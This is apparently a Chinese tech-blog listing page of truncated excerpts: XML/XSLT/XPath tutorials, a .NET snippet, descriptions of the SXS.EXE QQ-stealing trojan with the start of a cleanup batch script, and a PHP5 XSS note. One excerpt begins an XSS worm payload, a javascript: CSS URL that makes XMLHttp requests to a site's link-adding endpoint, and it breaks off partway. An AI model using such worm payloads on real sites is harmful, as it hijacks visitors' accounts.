[%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]％] [%_repeat_0%]   SXS.EXE这是一个盗取QQ帐号密码的木马病毒，特点是可以通过可移动磁盘传播。该病毒的主要危害是盗取QQ帐户和密码；该病毒还会结束大量反病毒软件，降低系统的安全等级。 中毒症状：电脑分区双击不能自动打开或者很难打开，用右键打开可以！这是最显见的症状！ 解决方式：网上已经有很多手动删除的方式！ 现在有个最...

 目前内容管理系统，展现给客户端具体数据的方式主要是：XML+XSL 或者Html两种方式。以CSDN为例，目前这两种方式都存在。比如：论坛，我们用的是XML+XSL方式，文档中心我们用的是SHTML方式。        根据我的使用心得。XML+XSL的方式，优点在于：数据层跟展现分开了。XML定义数据，XSL定义显示。比较明显的缺点就是1、有些用户在装了某些XML编辑器后，客户端解析XML+XSL就会出问题，用户直接看到的就是XML代码，不时总有人抱怨自己没法看CSDN的论坛了。原因基本上都...

xslt支持的测试模式语句，用于条件判断,主要有：<xsl:if> 和<xsl:choose>及其下的<xsl:when>和<xsl:otherwise>  还是在匹配模式中使用的用户列表数据源。1:使用xsl:if  <?xml version="1.0" encoding="GB2312"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Trans...

<xsl:template> 元素定义了用于匹配节点的规则（match，其中"/"匹配整个文档），在apply-template使用   语法规则为：<xsl:templatename="name"match="pattern"mode="mode"priority="number">  <!-- Content:(<xsl:param>*,template) --></xsl:template>  其中：  nam...

什么是XPath  XPath（可扩展路径） 是给 XSL 转换［XSLT］和 XPointer ［XPointer］的共享功能提供一个共用的句法及语义的结果。XPath的主要的目是用于对 XML 文档元件寻址。在支持这个主要目的的同时，它也为字符串，数字和布尔的操作提供了基本手段。XPath 使用简明的、非 XML 句法以便於在 URIs 和 XML 属性值以内使用 XPath，XPath 对 XML&n...

什么是选择模式选择模式语句将数据从XML中提取出来，是一种简单获得数据的方法，这几个标记都有一个select属性，选取XML中特定的结点名的数据 注意，每个xsl文件都需要导入xsl的命名空间，http://www.w3.org/TR/WD-xsl，例如在xml头声明之后加入：<p xmlns:xsl="http://www.w3.org/TR/WD-xsl">1、<xsl:for-each>  这个语句是逐个(select)选择某条件，应用条件。例如,有如下数据库的用户列表：<?xml version="1.0"...

什么是XSL  全称Extensible Style Language，中文译作扩展样式语言，用于格式化XML文档,它由两部分组成.  1（XSLT ）:XSL Transformation Language(XSLT),它可以把XML文档从一种格式转化为另一种格式.如转成html,文本或是基于文本的文档.  2（ XPath）:XSL格式化对象,格式化对象提供了CSS的另一方式来格式化XML文档,以及应用样式到XML文档上!XML的使用  如下Html格...

其实这个话题很早就想说说了，发现国内不少PHP站点都有XSS漏洞。今天偶然看到PHP5的一个XSS漏洞，在此小结一下。顺便提醒，使用PHP5的朋友最好打下补丁，或者升级一下。如果你不懂什么是XSS，可以看这里，或者这里（中文的也许会好懂一些）。国内不少论坛都存在跨站脚本漏洞，例如这里  有一个Google Hack+XSS的攻击例子，针对的是Discuz 4.0.0RC3。国外也很多这样的例子，甚至Google也出现过，不过在12月初时修正了。跨站攻击很容易就可以构造，而且非常隐蔽，不易被查觉（通常盗取信息后马上跳转回原页面）。如何攻击，在此不作说明（也...

XslTransform.Transform 方法将结果输出到字符串里有2中办法： 通过System.IO.MemoryStream类来实现。 通过System.Text.StringBuilder类来实现。 下面是具体的实现方法： [code]System.Xml.Xsl.XslTransform RssXslt = new System.Xml.Xsl.XslTransform();  System.Xml.XmlDocument RssXml = n...

文章作者：茄子宝信息来源：邪恶八进制信息安全团队（www.eviloctal.com）看到梦之光芒放出来了!我也不藏了!10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.其实很简单,就是两次转码.<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S...

sxs2.exe病毒把系统时间改为1980年4月1日,卡巴斯基马上停止工作,用autorun连接sxs2.exe程序,电脑就种上了.把以下文字复制进文本文档,另存为"清理sxs2.bat"双击运行.[code]@echo off color 1a echo . echo 欢迎使用 echo . echo 本程序主要应对sxs2.exe病毒,症状主要表现为“时间被改成1980.4.1，开机提示时间错误 echo 无法查看隐藏文件，卡巴斯基提示激活错误，磁盘需要右键打开...